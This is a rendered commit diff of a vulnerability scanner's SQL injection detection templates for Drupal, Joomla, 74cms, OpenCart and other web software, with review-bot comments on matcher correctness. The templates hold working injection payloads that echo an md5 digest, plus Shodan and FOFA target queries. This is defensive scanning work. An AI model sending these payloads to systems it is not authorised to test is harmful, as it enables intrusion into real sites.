Merge pull request #4685 from ritikchaddha/patch-91

Update SQL templates
patch-1
Prince Chaddha 2022-06-30 14:14:48 +05:30 committed by GitHub
commit e8d713412f
24 changed files with 143 additions and 71 deletions


@ -18,23 +18,26 @@ info:
cve-id: CVE-2014-3704
tags: cve,cve2014,drupal,sqli
variables:
num: "999999999"
requests:
- method: POST
path:
- "{{BaseURL}}/?q=node&destination=node"
body: 'pass=lol&form_build_id=&form_id=user_login_block&op=Log+in&name[0 or updatexml(0x23,concat(1,md5(1234567890)),1)%23]=bob&name[0]=a'
body: 'pass=lol&form_build_id=&form_id=user_login_block&op=Log+in&name[0 or updatexml(0x23,concat(1,md5({{num}})),1)%23]=bob&name[0]=a'
matchers-condition: and
matchers:
- type: word
words:
- "PDOException"
- '{{md5({{num}})}}'
condition: and
part: body
- type: status
status:
- 500
- type: word
words:
- "PDOException"
- "e807f1fcf82d132f9bb018ca6738a19f"
condition: and
part: body
# Enhanced by mp on 2022/02/24
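Review bot: Under `matchers-condition: and` the template fires only if every matcher hits, so the word matcher carrying the old literal digest `e807f1fcf82d132f9bb018ca6738a19f` must be gone from the new side, not merely joined by the new `'{{md5({{num}})}}'` block: the payload no longer hashes 1234567890, so a retained block can never match and the template would silently stop detecting. The rendering has lost the +/- markers and prints both blocks, so please confirm the old one was removed rather than kept. The same check applies to the zcms section at the end of this commit, where the old digest block is likewise printed after the new one.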


@ -13,15 +13,18 @@ info:
cve-id: CVE-2015-7297
tags: cve,cve2015,joomla,sqli
variables:
num: "999999999"
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_contenthistory&view=history&list[ordering]=&item_id=1&type_id=1&list[select]=updatexml(0x23,concat(1,md5(8888)),1)"
- "{{BaseURL}}/index.php?option=com_contenthistory&view=history&list[ordering]=&item_id=1&type_id=1&list[select]=updatexml(0x23,concat(1,md5({{num}})),1)"
matchers:
- type: word
words:
- "cf79ae6addba60ad018347359bd144d2"
- '{{md5({{num}})}}'
part: body
# Enhanced by mp on 2022/03/02
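Review bot: `num: "999999999"` deserves a comment saying why it is quoted, because a later cleanup into a bare integer would pass yamllint yet may change what the DSL hashes: `md5({{num}})` in the matcher has to hash exactly the decimal text that MySQL hashes when `md5({{num}})` is interpolated into the query, and a bare scalar may be retyped by the YAML loader. Suggested: `num: "999999999"  # keep quoted: the matcher's md5() must hash the same text as md5() in the query`. The same line is added in every `variables:` hunk of this commit, so one comment per file keeps the intent visible to the next maintainer.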


@ -18,15 +18,18 @@ info:
cwe-id: CWE-89
tags: cve,cve2017,joomla,sqli
variables:
num: "999999999"
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml(0x23,concat(1,md5(8888)),1)"
- "{{BaseURL}}/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml(0x23,concat(1,md5({{num}})),1)"
matchers:
- type: word
part: body
words:
- "cf79ae6addba60ad018347359bd144d2"
- '{{md5({{num}})}}'
# Enhanced by mp on 2022/05/11


@ -16,13 +16,16 @@ info:
cwe-id: CWE-89
tags: cve,cve2018,opencart,sqli
variables:
num: "999999999"
requests:
- raw:
- |
POST /upload/index.php?route=extension/payment/divido/update HTTP/1.1
Host: {{Hostname}}
{"metadata":{"order_id":"1 and updatexml(1,concat(0x7e,(SELECT md5(202072102)),0x7e),1)"},"status":2}
{"metadata":{"order_id":"1 and updatexml(1,concat(0x7e,(SELECT md5({{num}})),0x7e),1)"},"status":2}
redirects: true
max-redirects: 2
@ -32,7 +35,7 @@ requests:
- type: word
part: body
words:
- "6f7c6dcbc380aac3bcba1f9fccec991e"
- '{{md5({{num}})}}'
- type: status
status:
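Review bot: The word matcher in the second hunk now requires the full 32-character digest, but the first hunk wraps it as `concat(0x7e,(SELECT md5({{num}})),0x7e)` inside updatexml, and MySQL's XPATH syntax error echoes only a bounded window of that string; the pre-change wuzhicms matcher in this same commit (`81dc9bdb52d04dc20036dbd8313ed05`, 31 hex characters behind a 0x7e prefix) is consistent with the digest losing its final character in the echoed error. If that is what a live response shows, `'{{md5({{num}})}}'` never matches and the template reports a false negative where the old literal did not. Verify against a lab instance before merging, and consider matching on an error marker plus the digest prefix rather than the whole digest. The same 0x7e/0x0a-prefixed updatexml or extractvalue pattern with a full-digest matcher appears in the 74cms (`AjaxPersonal`), phpok, seacms, wuzhicms and xdcms sections.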


@ -15,20 +15,22 @@ info:
cve-id: CVE-2020-22210
cwe-id: CWE-89
metadata:
verified: true
fofa-query: app="74cms"
shodan-query: http.html:"Powered by 74cms"
shodan-query: http.html:"74cms"
tags: cve,cve2020,74cms,sqli
variables:
num: "999999999"
requests:
- method: GET
path:
- "{{BaseURL}}/plus/ajax_street.php?act=alphabet&x=11<31>'%20union%20select%201,2,3,concat(0x3C2F613E20),5,6,7,md5({{randstr}}),9%20from%20qs_admin#"
- '{{BaseURL}}/plus/ajax_street.php?act=alphabet&x=11<31>%27%20union%20select%201,2,3,concat(0x3C2F613E20),5,6,7,md5({{num}}),9%20from%20qs_admin#'
matchers:
- type: word
part: body
words:
- '{{md5("{{randstr}}")}}'
- '{{md5({{num}})}}'
# Enhanced by cs on 2022/06/21
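Review bot: The `shodan-query` edit from `http.html:"Powered by 74cms"` to `http.html:"74cms"` is a target-selection change unrelated to the md5/`{{num}}` templating this PR is about, and the title `Update SQL templates` does not mention it; the rendering has lost the +/- markers, so the direction is inferred from print order. Either call it out in the description or split it into its own commit so the broader query can be reviewed on its own. The same edit appears in the next three 74cms sections.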


@ -16,18 +16,21 @@ info:
cwe-id: CWE-89
metadata:
fofa-query: app="74cms"
shodan-query: http.html:"Powered by 74cms"
shodan-query: http.html:"74cms"
tags: cve,cve2020,74cms,sqli
variables:
num: "999999999"
requests:
- method: GET
path:
- "{{BaseURL}}/plus/ajax_common.php?act=hotword&query=aa%錦%27%20union%20select%201,md5({{randstr}}),3%23%27"
- '{{BaseURL}}/plus/ajax_common.php?act=hotword&query=aa%錦%27%20union%20select%201,md5({{num}}),3%23%27'
matchers:
- type: word
part: body
words:
- '{{md5("{{randstr}}")}}'
- '{{md5({{num}})}}'
# Enhanced by cs on 2022/06/21


@ -16,18 +16,21 @@ info:
cwe-id: CWE-89
metadata:
fofa-query: app="74cms"
shodan-query: http.html:"Powered by 74cms"
shodan-query: http.html:"74cms"
tags: cve,cve2020,74cms,sqli
variables:
num: "999999999"
requests:
- method: GET
path:
- "{{BaseURL}}/plus/ajax_officebuilding.php?act=key&key=錦%27%20a<>nd%201=2%20un<>ion%20sel<>ect%201,2,3,md5({{randstr}}),5,6,7,8,9%23"
- '{{BaseURL}}/plus/ajax_officebuilding.php?act=key&key=錦%27%20a<>nd%201=2%20un<>ion%20sel<>ect%201,2,3,md5({{num}}),5,6,7,8,9%23'
matchers:
- type: word
part: body
words:
- '{{md5("{{randstr}}")}}'
- '{{md5({{num}})}}'
# Enhanced by cs on 2022/06/21


@ -16,18 +16,21 @@ info:
cwe-id: CWE-89
metadata:
fofa-query: app="74cms"
shodan-query: http.html:"Powered by 74cms"
shodan-query: http.html:"74cms"
tags: cve,cve2020,74cms,sqli
variables:
num: "999999999"
requests:
- method: GET
path:
- "{{BaseURL}}/plus/ajax_street.php?act=key&key=%E9%8C%A6%27%20union%20select%201,2,3,4,5,6,7,md5({{randstr}}),9%23"
- '{{BaseURL}}/plus/ajax_street.php?act=key&key=%E9%8C%A6%27%20union%20select%201,2,3,4,5,6,7,md5({{num}}),9%23'
matchers:
- type: word
part: body
words:
- '{{md5("{{randstr}}")}}'
- '{{md5({{num}})}}'
# Enhanced by cs on 2022/06/21


@ -17,6 +17,9 @@ info:
cwe-id: CWE-89
tags: cve,cve2021,sqli,wp,wordpress,wp-plugin,authenticated
variables:
num: "999999999"
requests:
- raw:
- |
@ -29,7 +32,7 @@ requests:
log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
- |
GET /wp-admin/admin-ajax.php?action=refDetails&requests=%7B%22refUrl%22:%22'%20union%20select%201,1,md5('CVE-2021-24750'),4--%20%22%7D HTTP/1.1
GET /wp-admin/admin-ajax.php?action=refDetails&requests=%7B%22refUrl%22:%22'%20union%20select%201,1,md5({{num}}),4--%20%22%7D HTTP/1.1
Host: {{Hostname}}
cookie-reuse: true
@ -38,7 +41,7 @@ requests:
- type: word
part: body
words:
- "266f89556d2b38ff067b580fb305c522"
- '{{md5({{num}})}}'
- type: status
status:


@ -18,17 +18,20 @@ info:
cwe-id: CWE-89
tags: sqli,cve,cve2021
variables:
num: "999999999"
requests:
- method: GET
path:
- "{{BaseURL}}/api/experimental/patternfile?order=id%3Bselect(md5('nuclei'))&page=0&page_size=0"
- "{{BaseURL}}/api/experimental/patternfile?order=id%3Bselect(md5({{num}}))&page=0&page_size=0"
matchers-condition: and
matchers:
- type: word
words:
- "709b38b27304df6257a86a60df742c4c"
- '{{md5({{num}})}}'
part: body
- type: status


@ -13,6 +13,9 @@ info:
cve-id: CVE-2021-41691
tags: cve,cve2021,opensis,sqli,auth
variables:
num: "999999999"
requests:
- raw:
- |
@ -29,7 +32,7 @@ requests:
Origin: {{BaseURL}}
Content-Type: application/x-www-form-urlencoded
student_id=updatexml(0x23,concat(1,md5(1234)),1)&button=Save&TRANSFER[SCHOOL]=5&TRANSFER[Grade_Level]=5
student_id=updatexml(0x23,concat(1,md5({{num}})),1)&button=Save&TRANSFER[SCHOOL]=5&TRANSFER[Grade_Level]=5
attack: pitchfork
payloads:
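Review bot: No hunk in this section touches the matchers, yet the second hunk changes the payload to hash `{{num}}` instead of `1234`; if the file's matcher still carries the literal digest of 1234, it can no longer match anything the new payload produces and the template silently stops detecting. Please confirm the matcher was changed to `'{{md5({{num}})}}'` as in the other templates of this commit, or add that hunk. The raw request this line belongs to starts before the hunk, so the surrounding matcher block is not visible here.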


@ -19,10 +19,13 @@ info:
verified: "true"
tags: cve,cve2022,sqli
variables:
num: "999999999"
requests:
- raw:
- |
GET /mims/updatecustomer.php?customer_number=-1'%20UNION%20ALL%20SELECT%20NULL,NULL,CONCAT(md5("{{randstr}}"),1,2),NULL,NULL,NULL,NULL,NULL,NULL' HTTP/1.1
GET /mims/updatecustomer.php?customer_number=-1'%20UNION%20ALL%20SELECT%20NULL,NULL,CONCAT(md5({{num}}),1,2),NULL,NULL,NULL,NULL,NULL,NULL' HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
@ -31,7 +34,7 @@ requests:
- type: word
part: body
words:
- '{{md5("{{randstr}}")}}'
- '{{md5({{num}})}}'
- type: status
status:


@ -20,6 +20,9 @@ info:
verified: "true"
tags: cve,cve2022,sqli,cms,collegemanagement
variables:
num: "999999999"
requests:
- raw:
- |
@ -27,13 +30,13 @@ requests:
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
submit=Press&roll_no=3&course_code=sd' UNION ALL SELECT CONCAT(md5("{{randstr}}"),12,21),NULL,NULL,NULL,NULL#
submit=Press&roll_no=3&course_code=sd' UNION ALL SELECT CONCAT(md5({{num}}),12,21),NULL,NULL,NULL,NULL#
matchers-condition: and
matchers:
- type: word
words:
- '{{md5("{{randstr}}")}}'
- '{{md5({{num}})}}'
- type: status
status:


@ -9,17 +9,20 @@ info:
- http://www.dedeyuan.com/xueyuan/wenti/1244.html
tags: sqli,dedecms
variables:
num: "999999999"
requests:
- method: GET
path:
- "{{BaseURL}}/member/ajax_membergroup.php?action=post&membergroup=@`'`/*!50000Union+*/+/*!50000select+*/+md5(999999)+--+@`'`"
- "{{BaseURL}}/member/ajax_membergroup.php?action=post&membergroup=@`'`/*!50000Union+*/+/*!50000select+*/+md5({{num}})+--+@`'`"
matchers-condition: and
matchers:
- type: word
words:
- "52c69e3a57331081823331c4e69d3f2e"
- '{{md5({{num}})}}'
part: body
- type: status


@ -14,15 +14,18 @@ info:
cwe-id: CWE-89
tags: 74cms,sqli
variables:
num: "999999999"
requests:
- method: GET
path:
- '{{BaseURL}}/index.php?m=&c=AjaxPersonal&a=company_focus&company_id[0]=match&company_id[1][0]=test") and extractvalue(1,concat(0x7e,md5(1234567890))) -- a'
- '{{BaseURL}}/index.php?m=&c=AjaxPersonal&a=company_focus&company_id[0]=match&company_id[1][0]=test") and extractvalue(1,concat(0x7e,md5({{num}}))) -- a'
matchers:
- type: word
words:
- "e807f1fcf82d132f9bb018ca6738a19f"
- '{{md5({{num}})}}'
part: body
# Enhanced by ritikchaddha on 2022/05/05


@ -6,21 +6,24 @@ info:
severity: high
reference:
- https://redn3ck.github.io/2016/11/01/duomiCMS/
metadata:
verified: true
shodan-query: title:"DuomiCMS"
tags: duomicms,sqli
variables:
num: "999999999"
requests:
- method: GET
path:
- "{{BaseURL}}/duomiphp/ajax.php?action=addfav&id=1&uid=1%20and%20extractvalue(1,concat_ws(1,1,md5(9999999999)))"
- "{{BaseURL}}/duomiphp/ajax.php?action=addfav&id=1&uid=1%20and%20extractvalue(1,concat_ws(1,1,md5({{num}})))"
matchers-condition: and
matchers:
- type: word
words:
- "e0ec043b3f9e198ec09041687e4d4e8d"
part: body
condition: and
- '{{md5({{num}})}}'
- type: status
status:


@ -9,10 +9,13 @@ info:
- https://www.anquanke.com/post/id/168991
tags: etouch,sqli
variables:
num: "999999999"
requests:
- method: GET
path:
- "{{BaseURL}}/upload/mobile/index.php?c=category&a=asynclist&price_max=1.0%20AND%20(SELECT%201%20FROM(SELECT%20COUNT(*),CONCAT(0x7e,md5(1),0x7e,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a)''"
- "{{BaseURL}}/upload/mobile/index.php?c=category&a=asynclist&price_max=1.0%20AND%20(SELECT%201%20FROM(SELECT%20COUNT(*),CONCAT(0x7e,md5({{num}}),0x7e,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a)''"
matchers-condition: and
matchers:
@ -22,5 +25,5 @@ requests:
- type: word
words:
- "c4ca4238a0b923820dcc509a6f75849b"
- '{{md5({{num}})}}'
part: body


@ -10,12 +10,15 @@ info:
- https://blog.csdn.net/dfdhxb995397/article/details/101385340
tags: finecms,sqli
variables:
num: "999999999"
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?c=api&m=data2&auth=582f27d140497a9d8f048ca085b111df&param=action=sql%20sql=%27select%20md5({{randstr}})%27"
- '{{BaseURL}}/index.php?c=api&m=data2&auth=582f27d140497a9d8f048ca085b111df&param=action=sql%20sql=%27select%20md5({{num}})%27'
matchers:
- type: word
words:
- '{{md5("{{randstr}}")}}'
- '{{md5({{num}})}}'


@ -5,17 +5,21 @@ info:
author: ritikchaddha
severity: high
metadata:
verified: true
fofa-query: app="phpok"
tags: phpok,sqli
variables:
num: "999999999"
requests:
- method: GET
path:
- "{{BaseURL}}/api.php?c=project&f=index&token=1234&id=news&sort=1 and extractvalue(1,concat(0x7e,md5({{randstr}}))) --+"
- '{{BaseURL}}/api.php?c=project&f=index&token=1234&id=news&sort=1 and extractvalue(1,concat(0x7e,md5({{num}}))) --+'
matchers-condition: and
matchers:
- type: word
part: body
words:
- '{{md5("{{randstr}}")}}'
- '{{md5({{num}})}}'


@ -8,10 +8,13 @@ info:
- https://www.uedbox.com/post/54561/
tags: seacms,sqli
variables:
num: "999999999"
requests:
- method: GET
path:
- "{{BaseURL}}/comment/api/index.php?gid=1&page=2&rlist[]=@`%27`,%20extractvalue(1,%20concat_ws(0x20,%200x5c,(select%20md5(202072102)))),@`%27`"
- "{{BaseURL}}/comment/api/index.php?gid=1&page=2&rlist[]=@`%27`,%20extractvalue(1,%20concat_ws(0x20,%200x5c,(select%20md5({{num}})))),@`%27`"
redirects: true
max-redirects: 2
@ -20,7 +23,7 @@ requests:
- type: word
part: body
words:
- "6f7c6dcbc380aac3bcba1f9fccec991e"
- '{{md5({{num}})}}'
- type: status
status:


@ -8,18 +8,21 @@ info:
- https://github.com/wuzhicms/wuzhicms/issues/184
tags: wuzhicms,sqli
variables:
num: "999999999"
requests:
- method: GET
path:
- "{{BaseURL}}/api/sms_check.php?param=1%27%20and%20updatexml(1,concat(0x7e,(SELECT%20MD5(1234)),0x7e),1)--%20"
- "{{BaseURL}}/api/sms_check.php?param=1%27%20and%20updatexml(1,concat(0x7e,(SELECT%20MD5({{num}})),0x7e),1)--%20"
matchers-condition: and
matchers:
- type: word
words:
- '{{md5({{num}})}}'
part: body
- type: status
status:
- 200
- type: word
words:
- "81dc9bdb52d04dc20036dbd8313ed05"
- "sql_error:MySQL Query Error"
part: body
condition: and
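Review bot: The new word matcher keys only on `'{{md5({{num}})}}'`, while the block it appears to replace also required `sql_error:MySQL Query Error` under `condition: and`; if the old block was dropped, the corroborating error string that tied the digest to the SQL error path is lost, and if it was retained, `matchers-condition: and` can never be satisfied because the literal digest is no longer produced. Keeping both words in the new block preserves the old template's precision: `- '{{md5({{num}})}}'`, `- "sql_error:MySQL Query Error"`, `condition: and`. The rendering does not make the new side certain, so please confirm which of the two happened.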


@ -8,6 +8,9 @@ info:
- https://www.uedbox.com/post/35188/
tags: sqli,xdcms
variables:
num: "999999999"
requests:
- method: POST
path:
@ -15,7 +18,7 @@ requests:
headers:
Content-Type: application/x-www-form-urlencoded
body: |
username=dd' or extractvalue(0x0a,concat(0x0a,810663301*872821376))#&password=dd&submit=+%B5%C7+%C2%BC+
username=dd' or extractvalue(0x0a,concat(0x0a,md5({{num}})))#&password=dd&submit=+%B5%C7+%C2%BC+
matchers-condition: and
matchers:
@ -27,10 +30,8 @@ requests:
- type: word
words:
- "707564257851522176"
- "XPATH syntax error:"
- '{{md5({{num}})}}'
part: body
condition: and
- type: status
status:


@ -8,17 +8,20 @@ info:
- http://wiki.peiqi.tech/PeiQi_Wiki/OA%E4%BA%A7%E5%93%81%E6%BC%8F%E6%B4%9E/%E7%94%A8%E5%8F%8BOA/%E7%94%A8%E5%8F%8B%20U8%20OA%20test.jsp%20SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E.html
tags: yonyou,oa,sqli
variables:
num: "999999999"
requests:
- method: GET
path:
- "{{BaseURL}}/yyoa/common/js/menu/test.jsp?doType=101&S1=(SELECT%20md5({{randstr}}))"
- '{{BaseURL}}/yyoa/common/js/menu/test.jsp?doType=101&S1=(SELECT%20md5({{num}}))'
matchers-condition: and
matchers:
- type: word
part: body
words:
- '{{md5("{{randstr}}")}}'
- '{{md5({{num}})}}'
- type: status
status:


@ -8,16 +8,21 @@ info:
- https://www.anquanke.com/post/id/183241
tags: zcms,sqli
variables:
num: "999999999"
requests:
- method: GET
path:
- "{{BaseURL}}/admin/cms_channel.php?del=123456+AND+(SELECT+1+FROM(SELECT+COUNT(*)%2cCONCAT(0x7e%2cmd5(202072102)%2c0x7e%2cFLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.CHARACTER_SETS+GROUP+BY+x)a)--%2b'"
- "{{BaseURL}}/admin/cms_channel.php?del=123456+AND+(SELECT+1+FROM(SELECT+COUNT(*)%2cCONCAT(0x7e%2cmd5({{num}})%2c0x7e%2cFLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.CHARACTER_SETS+GROUP+BY+x)a)--%2b'"
matchers-condition: and
matchers:
- type: word
words:
- '{{md5({{num}})}}'
part: body
- type: status
status:
- 200
- type: word
words:
- "6f7c6dcbc380aac3bcba1f9fccec991e"
part: body